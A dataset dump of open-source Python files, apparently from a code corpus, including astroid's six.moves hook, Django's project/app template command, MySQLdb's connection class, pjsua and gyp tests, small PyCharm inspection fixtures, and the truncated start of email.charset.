code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
---|---|---|---|---|---|
# copyright 2003-2014 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:[email protected]
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option) any
# later version.
#
# astroid is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""Astroid hooks for six.moves."""
import sys
from textwrap import dedent
from astroid import MANAGER, register_module_extender
from astroid.builder import AstroidBuilder
def six_moves_transform_py2():
return AstroidBuilder(MANAGER).string_build(dedent('''
import urllib as _urllib
import urllib2 as _urllib2
import urlparse as _urlparse
class Moves(object):
import BaseHTTPServer
import CGIHTTPServer
import SimpleHTTPServer
from StringIO import StringIO
from cStringIO import StringIO as cStringIO
from UserDict import UserDict
from UserList import UserList
from UserString import UserString
import __builtin__ as builtins
import thread as _thread
import dummy_thread as _dummy_thread
import ConfigParser as configparser
import copy_reg as copyreg
from itertools import (imap as map,
ifilter as filter,
ifilterfalse as filterfalse,
izip_longest as zip_longest,
izip as zip)
import htmlentitydefs as html_entities
import HTMLParser as html_parser
import httplib as http_client
import cookielib as http_cookiejar
import Cookie as http_cookies
import Queue as queue
import repr as reprlib
from pipes import quote as shlex_quote
import SocketServer as socketserver
import SimpleXMLRPCServer as xmlrpc_server
import xmlrpclib as xmlrpc_client
import _winreg as winreg
import robotparser as urllib_robotparser
input = raw_input
intern = intern
range = xrange
xrange = xrange
reduce = reduce
reload_module = reload
class UrllibParse(object):
ParseResult = _urlparse.ParseResult
SplitResult = _urlparse.SplitResult
parse_qs = _urlparse.parse_qs
parse_qsl = _urlparse.parse_qsl
urldefrag = _urlparse.urldefrag
urljoin = _urlparse.urljoin
urlparse = _urlparse.urlparse
urlsplit = _urlparse.urlsplit
urlunparse = _urlparse.urlunparse
urlunsplit = _urlparse.urlunsplit
quote = _urllib.quote
quote_plus = _urllib.quote_plus
unquote = _urllib.unquote
unquote_plus = _urllib.unquote_plus
urlencode = _urllib.urlencode
splitquery = _urllib.splitquery
splittag = _urllib.splittag
splituser = _urllib.splituser
uses_fragment = _urlparse.uses_fragment
uses_netloc = _urlparse.uses_netloc
uses_params = _urlparse.uses_params
uses_query = _urlparse.uses_query
uses_relative = _urlparse.uses_relative
class UrllibError(object):
URLError = _urllib2.URLError
HTTPError = _urllib2.HTTPError
ContentTooShortError = _urllib.ContentTooShortError
class DummyModule(object):
pass
class UrllibRequest(object):
urlopen = _urllib2.urlopen
install_opener = _urllib2.install_opener
build_opener = _urllib2.build_opener
pathname2url = _urllib.pathname2url
url2pathname = _urllib.url2pathname
getproxies = _urllib.getproxies
Request = _urllib2.Request
OpenerDirector = _urllib2.OpenerDirector
HTTPDefaultErrorHandler = _urllib2.HTTPDefaultErrorHandler
HTTPRedirectHandler = _urllib2.HTTPRedirectHandler
HTTPCookieProcessor = _urllib2.HTTPCookieProcessor
ProxyHandler = _urllib2.ProxyHandler
BaseHandler = _urllib2.BaseHandler
HTTPPasswordMgr = _urllib2.HTTPPasswordMgr
HTTPPasswordMgrWithDefaultRealm = _urllib2.HTTPPasswordMgrWithDefaultRealm
AbstractBasicAuthHandler = _urllib2.AbstractBasicAuthHandler
HTTPBasicAuthHandler = _urllib2.HTTPBasicAuthHandler
ProxyBasicAuthHandler = _urllib2.ProxyBasicAuthHandler
AbstractDigestAuthHandler = _urllib2.AbstractDigestAuthHandler
HTTPDigestAuthHandler = _urllib2.HTTPDigestAuthHandler
ProxyDigestAuthHandler = _urllib2.ProxyDigestAuthHandler
HTTPHandler = _urllib2.HTTPHandler
HTTPSHandler = _urllib2.HTTPSHandler
FileHandler = _urllib2.FileHandler
FTPHandler = _urllib2.FTPHandler
CacheFTPHandler = _urllib2.CacheFTPHandler
UnknownHandler = _urllib2.UnknownHandler
HTTPErrorProcessor = _urllib2.HTTPErrorProcessor
urlretrieve = _urllib.urlretrieve
urlcleanup = _urllib.urlcleanup
proxy_bypass = _urllib.proxy_bypass
urllib_parse = UrllibParse()
urllib_error = UrllibError()
urllib = DummyModule()
urllib.request = UrllibRequest()
urllib.parse = UrllibParse()
urllib.error = UrllibError()
moves = Moves()
'''))
def six_moves_transform_py3():
return AstroidBuilder(MANAGER).string_build(dedent('''
class Moves(object):
import _io
cStringIO = _io.StringIO
filter = filter
from itertools import filterfalse
input = input
from sys import intern
map = map
range = range
from imp import reload as reload_module
from functools import reduce
from shlex import quote as shlex_quote
from io import StringIO
from collections import UserDict, UserList, UserString
xrange = range
zip = zip
from itertools import zip_longest
import builtins
import configparser
import copyreg
import _dummy_thread
import http.cookiejar as http_cookiejar
import http.cookies as http_cookies
import html.entities as html_entities
import html.parser as html_parser
import http.client as http_client
import http.server
BaseHTTPServer = CGIHTTPServer = SimpleHTTPServer = http.server
import pickle as cPickle
import queue
import reprlib
import socketserver
import _thread
import winreg
import xmlrpc.server as xmlrpc_server
import xmlrpc.client as xmlrpc_client
import urllib.robotparser as urllib_robotparser
import email.mime.multipart as email_mime_multipart
import email.mime.nonmultipart as email_mime_nonmultipart
import email.mime.text as email_mime_text
import email.mime.base as email_mime_base
import urllib.parse as urllib_parse
import urllib.error as urllib_error
import tkinter
import tkinter.dialog as tkinter_dialog
import tkinter.filedialog as tkinter_filedialog
import tkinter.scrolledtext as tkinter_scrolledtext
import tkinter.simpledialog as tkinder_simpledialog
import tkinter.tix as tkinter_tix
import tkinter.ttk as tkinter_ttk
import tkinter.constants as tkinter_constants
import tkinter.dnd as tkinter_dnd
import tkinter.colorchooser as tkinter_colorchooser
import tkinter.commondialog as tkinter_commondialog
import tkinter.filedialog as tkinter_tkfiledialog
import tkinter.font as tkinter_font
import tkinter.messagebox as tkinter_messagebox
import urllib.request
import urllib.robotparser as urllib_robotparser
import urllib.parse as urllib_parse
import urllib.error as urllib_error
moves = Moves()
'''))
if sys.version_info[0] == 2:
TRANSFORM = six_moves_transform_py2
else:
TRANSFORM = six_moves_transform_py3
register_module_extender(MANAGER, 'six', TRANSFORM)
| Shouqun/node-gn | tools/depot_tools/third_party/logilab/astroid/brain/pysix_moves.py | Python | mit | 8,703 |
import cgi
import errno
import io
import mimetypes
import os
import posixpath
import re
import shutil
import stat
import sys
import tempfile
from os import path
import django
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import handle_extensions
from django.template import Context, Engine
from django.utils import archive, six
from django.utils.six.moves.urllib.request import urlretrieve
from django.utils.version import get_docs_version
_drive_re = re.compile('^([a-z]):', re.I)
_url_drive_re = re.compile('^([a-z])[:|]', re.I)
class TemplateCommand(BaseCommand):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
:param style: A color style object (see django.core.management.color).
:param app_or_project: The string 'app' or 'project'.
:param name: The name of the application or project.
:param directory: The directory to which the template should be copied.
:param options: The additional variables passed to project or app templates
"""
requires_system_checks = False
# The supported URL schemes
url_schemes = ['http', 'https', 'ftp']
# Can't perform any active locale changes during this command, because
# setting might not be available at all.
leave_locale_alone = True
# Rewrite the following suffixes when determining the target filename.
rewrite_template_suffixes = (
# Allow shipping invalid .py files without byte-compilation.
('.py-tpl', '.py'),
)
def add_arguments(self, parser):
parser.add_argument('name', help='Name of the application or project.')
parser.add_argument('directory', nargs='?', help='Optional destination directory')
parser.add_argument('--template', help='The path or URL to load the template from.')
parser.add_argument(
'--extension', '-e', dest='extensions',
action='append', default=['py'],
help='The file extension(s) to render (default: "py"). '
'Separate multiple extensions with commas, or use '
'-e multiple times.'
)
parser.add_argument(
'--name', '-n', dest='files',
action='append', default=[],
help='The file name(s) to render. Separate multiple extensions '
'with commas, or use -n multiple times.'
)
def handle(self, app_or_project, name, target=None, **options):
self.app_or_project = app_or_project
self.paths_to_remove = []
self.verbosity = options['verbosity']
self.validate_name(name, app_or_project)
# if some directory is given, make sure it's nicely expanded
if target is None:
top_dir = path.join(os.getcwd(), name)
try:
os.makedirs(top_dir)
except OSError as e:
if e.errno == errno.EEXIST:
message = "'%s' already exists" % top_dir
else:
message = e
raise CommandError(message)
else:
top_dir = os.path.abspath(path.expanduser(target))
if not os.path.exists(top_dir):
raise CommandError("Destination directory '%s' does not "
"exist, please create it first." % top_dir)
extensions = tuple(handle_extensions(options['extensions']))
extra_files = []
for file in options['files']:
extra_files.extend(map(lambda x: x.strip(), file.split(',')))
if self.verbosity >= 2:
self.stdout.write("Rendering %s template files with "
"extensions: %s\n" %
(app_or_project, ', '.join(extensions)))
self.stdout.write("Rendering %s template files with "
"filenames: %s\n" %
(app_or_project, ', '.join(extra_files)))
base_name = '%s_name' % app_or_project
base_subdir = '%s_template' % app_or_project
base_directory = '%s_directory' % app_or_project
camel_case_name = 'camel_case_%s_name' % app_or_project
camel_case_value = ''.join(x for x in name.title() if x != '_')
context = Context(dict(options, **{
base_name: name,
base_directory: top_dir,
camel_case_name: camel_case_value,
'docs_version': get_docs_version(),
'django_version': django.__version__,
'unicode_literals': '' if six.PY3 else '# -*- coding: utf-8 -*-\n'
'from __future__ import unicode_literals\n\n',
}), autoescape=False)
# Setup a stub settings environment for template rendering
if not settings.configured:
settings.configure()
django.setup()
template_dir = self.handle_template(options['template'],
base_subdir)
prefix_length = len(template_dir) + 1
for root, dirs, files in os.walk(template_dir):
path_rest = root[prefix_length:]
relative_dir = path_rest.replace(base_name, name)
if relative_dir:
target_dir = path.join(top_dir, relative_dir)
if not path.exists(target_dir):
os.mkdir(target_dir)
for dirname in dirs[:]:
if dirname.startswith('.') or dirname == '__pycache__':
dirs.remove(dirname)
for filename in files:
if filename.endswith(('.pyo', '.pyc', '.py.class')):
# Ignore some files as they cause various breakages.
continue
old_path = path.join(root, filename)
new_path = path.join(top_dir, relative_dir,
filename.replace(base_name, name))
for old_suffix, new_suffix in self.rewrite_template_suffixes:
if new_path.endswith(old_suffix):
new_path = new_path[:-len(old_suffix)] + new_suffix
break # Only rewrite once
if path.exists(new_path):
raise CommandError("%s already exists, overlaying a "
"project or app into an existing "
"directory won't replace conflicting "
"files" % new_path)
# Only render the Python files, as we don't want to
# accidentally render Django templates files
if new_path.endswith(extensions) or filename in extra_files:
with io.open(old_path, 'r', encoding='utf-8') as template_file:
content = template_file.read()
template = Engine().from_string(content)
content = template.render(context)
with io.open(new_path, 'w', encoding='utf-8') as new_file:
new_file.write(content)
else:
shutil.copyfile(old_path, new_path)
if self.verbosity >= 2:
self.stdout.write("Creating %s\n" % new_path)
try:
shutil.copymode(old_path, new_path)
self.make_writeable(new_path)
except OSError:
self.stderr.write(
"Notice: Couldn't set permission bits on %s. You're "
"probably using an uncommon filesystem setup. No "
"problem." % new_path, self.style.NOTICE)
if self.paths_to_remove:
if self.verbosity >= 2:
self.stdout.write("Cleaning up temporary files.\n")
for path_to_remove in self.paths_to_remove:
if path.isfile(path_to_remove):
os.remove(path_to_remove)
else:
shutil.rmtree(path_to_remove)
def handle_template(self, template, subdir):
"""
Determines where the app or project templates are.
Use django.__path__[0] as the default because we don't
know into which directory Django has been installed.
"""
if template is None:
return path.join(django.__path__[0], 'conf', subdir)
else:
if template.startswith('file://'):
template = template[7:]
expanded_template = path.expanduser(template)
expanded_template = path.normpath(expanded_template)
if path.isdir(expanded_template):
return expanded_template
if self.is_url(template):
# downloads the file and returns the path
absolute_path = self.download(template)
else:
absolute_path = path.abspath(expanded_template)
if path.exists(absolute_path):
return self.extract(absolute_path)
raise CommandError("couldn't handle %s template %s." %
(self.app_or_project, template))
def validate_name(self, name, app_or_project):
if name is None:
raise CommandError("you must provide %s %s name" % (
"an" if app_or_project == "app" else "a", app_or_project))
# If it's not a valid directory name.
if six.PY2:
if not re.search(r'^[_a-zA-Z]\w*$', name):
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." %
(name, app_or_project, message))
else:
if not name.isidentifier():
raise CommandError(
"%r is not a valid %s name. Please make sure the name is "
"a valid identifier." % (name, app_or_project)
)
def download(self, url):
"""
Downloads the given URL and returns the file name.
"""
def cleanup_url(url):
tmp = url.rstrip('/')
filename = tmp.split('/')[-1]
if url.endswith('/'):
display_url = tmp + '/'
else:
display_url = url
return filename, display_url
prefix = 'django_%s_template_' % self.app_or_project
tempdir = tempfile.mkdtemp(prefix=prefix, suffix='_download')
self.paths_to_remove.append(tempdir)
filename, display_url = cleanup_url(url)
if self.verbosity >= 2:
self.stdout.write("Downloading %s\n" % display_url)
try:
the_path, info = urlretrieve(url, path.join(tempdir, filename))
except IOError as e:
raise CommandError("couldn't download URL %s to %s: %s" %
(url, filename, e))
used_name = the_path.split('/')[-1]
# Trying to get better name from response headers
content_disposition = info.get('content-disposition')
if content_disposition:
_, params = cgi.parse_header(content_disposition)
guessed_filename = params.get('filename') or used_name
else:
guessed_filename = used_name
# Falling back to content type guessing
ext = self.splitext(guessed_filename)[1]
content_type = info.get('content-type')
if not ext and content_type:
ext = mimetypes.guess_extension(content_type)
if ext:
guessed_filename += ext
# Move the temporary file to a filename that has better
# chances of being recognized by the archive utils
if used_name != guessed_filename:
guessed_path = path.join(tempdir, guessed_filename)
shutil.move(the_path, guessed_path)
return guessed_path
# Giving up
return the_path
def splitext(self, the_path):
"""
Like os.path.splitext, but takes off .tar, too
"""
base, ext = posixpath.splitext(the_path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
def extract(self, filename):
"""
Extracts the given file to a temporarily and returns
the path of the directory with the extracted content.
"""
prefix = 'django_%s_template_' % self.app_or_project
tempdir = tempfile.mkdtemp(prefix=prefix, suffix='_extract')
self.paths_to_remove.append(tempdir)
if self.verbosity >= 2:
self.stdout.write("Extracting %s\n" % filename)
try:
archive.extract(filename, tempdir)
return tempdir
except (archive.ArchiveException, IOError) as e:
raise CommandError("couldn't extract file %s to %s: %s" %
(filename, tempdir, e))
def is_url(self, template):
"""
Returns True if the name looks like a URL
"""
if ':' not in template:
return False
scheme = template.split(':', 1)[0].lower()
return scheme in self.url_schemes
def make_writeable(self, filename):
"""
Make sure that the file is writeable.
Useful if our source is read-only.
"""
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
| mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/django/core/management/templates.py | Python | mit | 14,053 |
# $Id: 331_srtp_prefer_rtp_avp.py 2081 2008-06-27 21:59:15Z bennylp $
import inc_sip as sip
import inc_sdp as sdp
# When SRTP is NOT enabled in pjsua, it should prefer to use
# RTP/AVP media line if there are multiple m=audio lines
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=audio 5000 RTP/SAVP 0
a=crypto:1 aes_cm_128_hmac_sha1_80 inline:WnD7c1ksDGs+dIefCEo8omPg4uO8DYIinNGL5yxQ
m=audio 4000 RTP/AVP 0
"""
pjsua_args = "--null-audio --auto-answer 200 --use-srtp 0"
extra_headers = ""
include = ["Content-Type: application/sdp", # response must include SDP
"m=audio 0 RTP/SAVP[\\s\\S]+m=audio [1-9]+[0-9]* RTP/AVP"
]
exclude = ["a=crypto"]
sendto_cfg = sip.SendtoCfg("Prefer RTP/SAVP", pjsua_args, sdp, 200,
extra_headers=extra_headers,
resp_inc=include, resp_exc=exclude)
| lxki/pjsip | tests/pjsua/scripts-sendto/331_srtp_prefer_rtp_avp.py | Python | gpl-2.0 | 827 |
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simple rules when using an explicit build target of 'all'.
"""
import TestGyp
import os
import sys
test = TestGyp.TestGyp(formats=['make', 'ninja', 'android', 'xcode', 'msvs'])
test.run_gyp('actions.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('actions.gyp', chdir='relocate/src')
expect = """\
no dir here
hi c
hello baz
"""
if test.format == 'xcode':
chdir = 'relocate/src/subdir'
else:
chdir = 'relocate/src'
test.run_built_executable('gencc_int_output', chdir=chdir, stdout=expect)
if test.format == 'msvs':
test.run_built_executable('gencc_int_output_external', chdir=chdir,
stdout=expect)
test.must_match('relocate/src/subdir/foo/bar/baz.dirname',
os.path.join('foo', 'bar'))
test.must_match('relocate/src/subdir/a/b/c.dirname',
os.path.join('a', 'b'))
# FIXME the xcode and make generators incorrectly convert RULE_INPUT_PATH
# to an absolute path, making the tests below fail!
if test.format != 'xcode' and test.format != 'make':
test.must_match('relocate/src/subdir/foo/bar/baz.path',
os.path.join('foo', 'bar', 'baz.printvars'))
test.must_match('relocate/src/subdir/a/b/c.path',
os.path.join('a', 'b', 'c.printvars'))
test.pass_test()
| sgraham/nope | tools/gyp/test/rules-dirname/gyptest-dirname.py | Python | bsd-3-clause | 1,475 |
"""
This module implements connections for MySQLdb. Presently there is
only one class: Connection. Others are unlikely. However, you might
want to make your own subclasses. In most cases, you will probably
override Connection.default_cursor with a non-standard Cursor class.
"""
from MySQLdb import cursors
from _mysql_exceptions import Warning, Error, InterfaceError, DataError, \
DatabaseError, OperationalError, IntegrityError, InternalError, \
NotSupportedError, ProgrammingError
import types, _mysql
import re
def defaulterrorhandler(connection, cursor, errorclass, errorvalue):
"""
If cursor is not None, (errorclass, errorvalue) is appended to
cursor.messages; otherwise it is appended to
connection.messages. Then errorclass is raised with errorvalue as
the value.
You can override this with your own error handler by assigning it
to the instance.
"""
error = errorclass, errorvalue
if cursor:
cursor.messages.append(error)
else:
connection.messages.append(error)
del cursor
del connection
raise errorclass, errorvalue
re_numeric_part = re.compile(r"^(\d+)")
def numeric_part(s):
"""Returns the leading numeric part of a string.
>>> numeric_part("20-alpha")
20
>>> numeric_part("foo")
>>> numeric_part("16b")
16
"""
m = re_numeric_part.match(s)
if m:
return int(m.group(1))
return None
class Connection(_mysql.connection):
"""MySQL Database Connection Object"""
default_cursor = cursors.Cursor
def __init__(self, *args, **kwargs):
"""
Create a connection to the database. It is strongly recommended
that you only use keyword parameters. Consult the MySQL C API
documentation for more information.
host
string, host to connect
user
string, user to connect as
passwd
string, password to use
db
string, database to use
port
integer, TCP/IP port to connect to
unix_socket
string, location of unix_socket to use
conv
conversion dictionary, see MySQLdb.converters
connect_timeout
number of seconds to wait before the connection attempt
fails.
compress
if set, compression is enabled
named_pipe
if set, a named pipe is used to connect (Windows only)
init_command
command which is run once the connection is created
read_default_file
file from which default client values are read
read_default_group
configuration group to use from the default file
cursorclass
class object, used to create cursors (keyword only)
use_unicode
If True, text-like columns are returned as unicode objects
using the connection's character set. Otherwise, text-like
columns are returned as strings. columns are returned as
normal strings. Unicode objects will always be encoded to
the connection's character set regardless of this setting.
charset
If supplied, the connection character set will be changed
to this character set (MySQL-4.1 and newer). This implies
use_unicode=True.
sql_mode
If supplied, the session SQL mode will be changed to this
setting (MySQL-4.1 and newer). For more details and legal
values, see the MySQL documentation.
client_flag
integer, flags to use or 0
(see MySQL docs or constants/CLIENTS.py)
ssl
dictionary or mapping, contains SSL connection parameters;
see the MySQL documentation for more details
(mysql_ssl_set()). If this is set, and the client does not
support SSL, NotSupportedError will be raised.
local_infile
integer, non-zero enables LOAD LOCAL INFILE; zero disables
autocommit
If False (default), autocommit is disabled.
If True, autocommit is enabled.
If None, autocommit isn't set and server default is used.
There are a number of undocumented, non-standard methods. See the
documentation for the MySQL C API for some hints on what they do.
"""
from MySQLdb.constants import CLIENT, FIELD_TYPE
from MySQLdb.converters import conversions
from weakref import proxy
kwargs2 = kwargs.copy()
if 'conv' in kwargs:
conv = kwargs['conv']
else:
conv = conversions
conv2 = {}
for k, v in conv.items():
if isinstance(k, int) and isinstance(v, list):
conv2[k] = v[:]
else:
conv2[k] = v
kwargs2['conv'] = conv2
cursorclass = kwargs2.pop('cursorclass', self.default_cursor)
charset = kwargs2.pop('charset', '')
if charset:
use_unicode = True
else:
use_unicode = False
use_unicode = kwargs2.pop('use_unicode', use_unicode)
sql_mode = kwargs2.pop('sql_mode', '')
client_flag = kwargs.get('client_flag', 0)
client_version = tuple([ numeric_part(n) for n in _mysql.get_client_info().split('.')[:2] ])
if client_version >= (4, 1):
client_flag |= CLIENT.MULTI_STATEMENTS
if client_version >= (5, 0):
client_flag |= CLIENT.MULTI_RESULTS
kwargs2['client_flag'] = client_flag
# PEP-249 requires autocommit to be initially off
autocommit = kwargs2.pop('autocommit', False)
super(Connection, self).__init__(*args, **kwargs2)
self.cursorclass = cursorclass
self.encoders = dict([ (k, v) for k, v in conv.items()
if type(k) is not int ])
self._server_version = tuple([ numeric_part(n) for n in self.get_server_info().split('.')[:2] ])
db = proxy(self)
def _get_string_literal():
def string_literal(obj, dummy=None):
return db.string_literal(obj)
return string_literal
def _get_unicode_literal():
def unicode_literal(u, dummy=None):
return db.literal(u.encode(unicode_literal.charset))
return unicode_literal
def _get_string_decoder():
def string_decoder(s):
return s.decode(string_decoder.charset)
return string_decoder
string_literal = _get_string_literal()
self.unicode_literal = unicode_literal = _get_unicode_literal()
self.string_decoder = string_decoder = _get_string_decoder()
if not charset:
charset = self.character_set_name()
self.set_character_set(charset)
if sql_mode:
self.set_sql_mode(sql_mode)
if use_unicode:
self.converter[FIELD_TYPE.STRING].append((None, string_decoder))
self.converter[FIELD_TYPE.VAR_STRING].append((None, string_decoder))
self.converter[FIELD_TYPE.VARCHAR].append((None, string_decoder))
self.converter[FIELD_TYPE.BLOB].append((None, string_decoder))
self.encoders[types.StringType] = string_literal
self.encoders[types.UnicodeType] = unicode_literal
self._transactional = self.server_capabilities & CLIENT.TRANSACTIONS
if self._transactional:
if autocommit is not None:
self.autocommit(autocommit)
self.messages = []
def autocommit(self, on):
on = bool(on)
if self.get_autocommit() != on:
_mysql.connection.autocommit(self, on)
def cursor(self, cursorclass=None):
"""
Create a cursor on which queries may be performed. The
optional cursorclass parameter is used to create the
Cursor. By default, self.cursorclass=cursors.Cursor is
used.
"""
return (cursorclass or self.cursorclass)(self)
def __enter__(self):
if self.get_autocommit():
self.query("BEGIN")
return self.cursor()
def __exit__(self, exc, value, tb):
if exc:
self.rollback()
else:
self.commit()
def literal(self, o):
"""
If o is a single object, returns an SQL literal as a string.
If o is a non-string sequence, the items of the sequence are
converted and returned as a sequence.
Non-standard. For internal use; do not use this in your
applications.
"""
return self.escape(o, self.encoders)
def begin(self):
"""Explicitly begin a connection. Non-standard.
DEPRECATED: Will be removed in 1.3.
Use an SQL BEGIN statement instead."""
from warnings import warn
warn("begin() is non-standard and will be removed in 1.3",
DeprecationWarning, 2)
self.query("BEGIN")
if not hasattr(_mysql.connection, 'warning_count'):
def warning_count(self):
"""Return the number of warnings generated from the
last query. This is derived from the info() method."""
from string import atoi
info = self.info()
if info:
return atoi(info.split()[-1])
else:
return 0
def set_character_set(self, charset):
"""Set the connection character set to charset. The character
set can only be changed in MySQL-4.1 and newer. If you try
to change the character set from the current value in an
older version, NotSupportedError will be raised."""
if charset == "utf8mb4":
py_charset = "utf8"
else:
py_charset = charset
if self.character_set_name() != charset:
try:
super(Connection, self).set_character_set(charset)
except AttributeError:
if self._server_version < (4, 1):
raise NotSupportedError("server is too old to set charset")
self.query('SET NAMES %s' % charset)
self.store_result()
self.string_decoder.charset = py_charset
self.unicode_literal.charset = py_charset
def set_sql_mode(self, sql_mode):
"""Set the connection sql_mode. See MySQL documentation for
legal values."""
if self._server_version < (4, 1):
raise NotSupportedError("server is too old to set sql_mode")
self.query("SET SESSION sql_mode='%s'" % sql_mode)
self.store_result()
def show_warnings(self):
"""Return detailed information about warnings as a
sequence of tuples of (Level, Code, Message). This
is only supported in MySQL-4.1 and up. If your server
is an earlier version, an empty sequence is returned."""
if self._server_version < (4,1): return ()
self.query("SHOW WARNINGS")
r = self.store_result()
warnings = r.fetch_row(0)
return warnings
Warning = Warning
Error = Error
InterfaceError = InterfaceError
DatabaseError = DatabaseError
DataError = DataError
OperationalError = OperationalError
IntegrityError = IntegrityError
InternalError = InternalError
ProgrammingError = ProgrammingError
NotSupportedError = NotSupportedError
errorhandler = defaulterrorhandler
| skycucumber/Messaging-Gateway | webapp/venv/lib/python2.7/site-packages/MySQLdb/connections.py | Python | gpl-2.0 | 11,777 |
class A:
def __init__(self, a:int, b:float, *args:tuple, c:complex, **kwargs:dict) -> None:
pass
class B(A):
def <warning descr="Call to __init__ of super class is missed">__i<caret>nit__</warning>(self, d:str, *, e:bytes) -> list:
pass | idea4bsd/idea4bsd | python/testData/inspections/AddCallSuperTypeAnnotationsPreserved.py | Python | apache-2.0 | 261 |
# Generated from 'Aliases.h'
def FOUR_CHAR_CODE(x): return x
true = True
false = False
rAliasType = FOUR_CHAR_CODE('alis')
kARMMountVol = 0x00000001
kARMNoUI = 0x00000002
kARMMultVols = 0x00000008
kARMSearch = 0x00000100
kARMSearchMore = 0x00000200
kARMSearchRelFirst = 0x00000400
asiZoneName = -3
asiServerName = -2
asiVolumeName = -1
asiAliasName = 0
asiParentName = 1
kResolveAliasFileNoUI = 0x00000001
| xbmc/atv2 | xbmc/lib/libPython/Python/Lib/plat-mac/Carbon/Aliases.py | Python | gpl-2.0 | 407 |
class C(object):
def f(self, name):
return name
__getattr__ = f
c = C()
print(c.foo) #pass | asedunov/intellij-community | python/testData/inspections/PyUnresolvedReferencesInspection/getattrAttribute.py | Python | apache-2.0 | 108 |
a = [1 2 3] | smmribeiro/intellij-community | python/testData/psi/MissingListSeparators.py | Python | apache-2.0 | 11 |
class A:
def <weak_warning descr="Function name should be lowercase">fooBar</weak_warning>(self): pass
class B(A):
def fooBar(self): pass | kdwink/intellij-community | python/testData/inspections/PyPep8NamingInspection/overridden.py | Python | apache-2.0 | 142 |
def x():
print "bar"
print "foo"
print "xyzzy" | asedunov/intellij-community | python/testData/copyPaste/SingleLine.after.py | Python | apache-2.0 | 58 |
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: [email protected]
__all__ = [
'Charset',
'add_alias',
'add_charset',
'add_codec',
]
import email.base64mime
import email.quoprimime
from email import errors
from email.encoders import encode_7or8bit
# Flags for types of header encodings
QP = 1 # Quoted-Printable
BASE64 = 2 # Base64
SHORTEST = 3 # the shorter of QP and base64, but only for headers
# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7
MISC_LEN = 7
DEFAULT_CHARSET = 'us-ascii'
# Defaults
CHARSETS = {
# input header enc body enc output conv
'iso-8859-1': (QP, QP, None),
'iso-8859-2': (QP, QP, None),
'iso-8859-3': (QP, QP, None),
'iso-8859-4': (QP, QP, None),
# iso-8859-5 is Cyrillic, and not especially used
# iso-8859-6 is Arabic, also not particularly used
# iso-8859-7 is Greek, QP will not make it readable
# iso-8859-8 is Hebrew, QP will not make it readable
'iso-8859-9': (QP, QP, None),
'iso-8859-10': (QP, QP, None),
# iso-8859-11 is Thai, QP will not make it readable
'iso-8859-13': (QP, QP, None),
'iso-8859-14': (QP, QP, None),
'iso-8859-15': (QP, QP, None),
'windows-1252':(QP, QP, None),
'viscii': (QP, QP, None),
'us-ascii': (None, None, None),
'big5': (BASE64, BASE64, None),
'gb2312': (BASE64, BASE64, None),
'euc-jp': (BASE64, None, 'iso-2022-jp'),
'shift_jis': (BASE64, None, 'iso-2022-jp'),
'iso-2022-jp': (BASE64, None, None),
'koi8-r': (BASE64, BASE64, None),
'utf-8': (SHORTEST, BASE64, 'utf-8'),
# We're making this one up to represent raw unencoded 8-bit
'8bit': (None, BASE64, 'utf-8'),
}
# Aliases for other commonly-used names for character sets. Map
# them to the real ones used in email.
ALIASES = {
'latin_1': 'iso-8859-1',
'latin-1': 'iso-8859-1',
'latin_2': 'iso-8859-2',
'latin-2': 'iso-8859-2',
'latin_3': 'iso-8859-3',
'latin-3': 'iso-8859-3',
'latin_4': 'iso-8859-4',
'latin-4': 'iso-8859-4',
'latin_5': 'iso-8859-9',
'latin-5': 'iso-8859-9',
'latin_6': 'iso-8859-10',
'latin-6': 'iso-8859-10',
'latin_7': 'iso-8859-13',
'latin-7': 'iso-8859-13',
'latin_8': 'iso-8859-14',
'latin-8': 'iso-8859-14',
'latin_9': 'iso-8859-15',
'latin-9': 'iso-8859-15',
'cp949': 'ks_c_5601-1987',
'euc_jp': 'euc-jp',
'euc_kr': 'euc-kr',
'ascii': 'us-ascii',
}
# Map charsets to their Unicode codec strings.
CODEC_MAP = {
'gb2312': 'eucgb2312_cn',
'big5': 'big5_tw',
# Hack: We don't want *any* conversion for stuff marked us-ascii, as all
# sorts of garbage might be sent to us in the guise of 7-bit us-ascii.
# Let that stuff pass through without conversion to/from Unicode.
'us-ascii': None,
}
# Convenience functions for extending the above mappings
def add_charset(charset, header_enc=None, body_enc=None, output_charset=None):
"""Add character set properties to the global registry.
charset is the input character set, and must be the canonical name of a
character set.
Optional header_enc and body_enc is either Charset.QP for
quoted-printable, Charset.BASE64 for base64 encoding, Charset.SHORTEST for
the shortest of qp or base64 encoding, or None for no encoding. SHORTEST
is only valid for header_enc. It describes how message headers and
message bodies in the input charset are to be encoded. Default is no
encoding.
Optional output_charset is the character set that the output should be
in. Conversions will proceed from input charset, to Unicode, to the
